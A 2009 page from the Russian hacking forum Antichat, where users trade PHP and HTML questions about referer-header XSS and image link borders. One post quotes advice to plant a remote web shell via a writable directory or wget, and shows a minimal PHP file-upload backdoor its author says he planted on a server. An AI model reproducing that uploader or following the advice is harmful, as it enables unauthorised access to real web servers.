ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8521  
Старый 05.02.2009, 17:52
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ink-developer  
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer
=$_SERVER['HTTP_REFERER'];
echo
"$referer";
?>
в вышеследующем коде нет ничего, кроме XSS
 
Ответить с цитированием

  #8522  
Старый 05.02.2009, 17:57
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
 
Ответить с цитированием

  #8523  
Старый 05.02.2009, 18:15
Аватар для c0m
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

Цитата:
Сообщение от groundhog  
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
залил )
PHP код:
<form enctype=multipart/form-data  method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST[go]))move_uploaded_file($_FILES[userfile][tmp_name],$_FILES[userfile][name]); ?>
з.ы. через инклуд не получалось

Спасибо
 
Ответить с цитированием

  #8524  
Старый 05.02.2009, 18:41
Аватар для geforce
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
По умолчанию

Вопрос:

Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
 
Ответить с цитированием

  #8525  
Старый 05.02.2009, 18:46
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Вопрос:

Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
Код:
<img src=site.ru/img.jpg></img>
 
Ответить с цитированием

  #8526  
Старый 05.02.2009, 18:50
Аватар для blaga
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


Отправить сообщение для blaga с помощью ICQ
По умолчанию

если память мне не изменяет то в теге img есть атрибут border=0
или что то в этом духе.. уже забыл...
 
Ответить с цитированием

  #8527  
Старый 05.02.2009, 18:51
Аватар для blaga
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
Провел на форуме:
2976185

Репутация: 694


Отправить сообщение для blaga с помощью ICQ
По умолчанию

mailbrush, в чем прикол закрывающего img ?
 
Ответить с цитированием

  #8528  
Старый 05.02.2009, 19:02
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
mailbrush, в чем прикол закрывающего img ?
Хз, по привычке =)

Цитата:
если память мне не изменяет то в теге img есть атрибут border=0
или что то в этом духе.. уже забыл...
Да, но по дефолту он так и стоит (0). Чел наверное сделал как-то так (пишу по памяти):
Код HTML:
<a href=site.ru/img.jpg><img src=site.ru/img.jpg></img></a>
 
Ответить с цитированием

  #8529  
Старый 05.02.2009, 19:04
Аватар для Jer1cho
Jer1cho
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
Провел на форуме:
3942177

Репутация: 244
Отправить сообщение для Jer1cho с помощью ICQ
По умолчанию

Епт, да ПРИЧЕМ здесь закрыт тег или нет? border="0" аттрибут ставь. ФФ и ИЕ обводят рамкой картинку иначе.

mailbrush зачем что-то писать если нихера не понимаешь.
 
Ответить с цитированием

  #8530  
Старый 05.02.2009, 20:45
Аватар для mff
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Jer1cho, да да , по дефолту стоит обводка 1px если не ошибаюсь.
Можно еще так сделать:
Код HTML:
<img src="http://forum.antichat.ru/antichat/pic/logo.gif" style="border: solid 0px;" />
а закрывающий тег, необязательный в html ставят для совместимости с xhtml...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ